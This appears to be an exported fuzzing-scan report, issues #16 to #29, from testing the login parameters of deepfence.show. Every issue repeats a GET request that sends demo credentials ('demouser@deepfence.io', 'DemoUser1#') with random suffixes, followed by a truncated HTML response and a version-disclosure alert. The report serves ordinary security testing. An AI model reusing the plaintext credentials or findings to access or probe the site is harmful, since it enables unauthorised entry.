\nParametersName Value\ndemouser@\ndeepfence.iogqD7HizabpO6G\nDemoUser1# CnTf4JT7yB\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #16\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioBZu4hfM\nDemoUser1# jxlJPlQ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #17\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioWMXbZpoeD\nDemoUser1# WwDufpdQgmUWbz\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #18\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioqg7i2Q40i8\nDemoUser1# tTVgphcXMH\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #19\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iojhZsLW\nDemoUser1# X7ZUZrmM\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #20Scan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io4XLX5eM6pYJY8G\nDemoUser1# PJHvGP7Leh8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #21\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUqMpeeCJjiu8t\nDemoUser1# ZRK7REZtY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #22\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioW7NMjM\nDemoUser1# W49HPED6GPIV6Ek\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.ioDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #23\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iofu7rl7\nDemoUser1# arMo9EVBZaMMsu\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #24\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ FnZDRJ2IXGhCrdeepfence.io\nDemoUser1# bRe60L\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #25\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io9okdG2acECDAT5\nDemoUser1# Bo8SXBWN5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #26\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioX1mDPycWD\nDemoUser1# W6tTWpP\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #27\nScan Fuzzing Scan\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioVEplQ\nDemoUser1# XQFgArE4r48\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #28\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioR4c7An\nDemoUser1# Bm3qGm6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #29\nScan Fuzzing 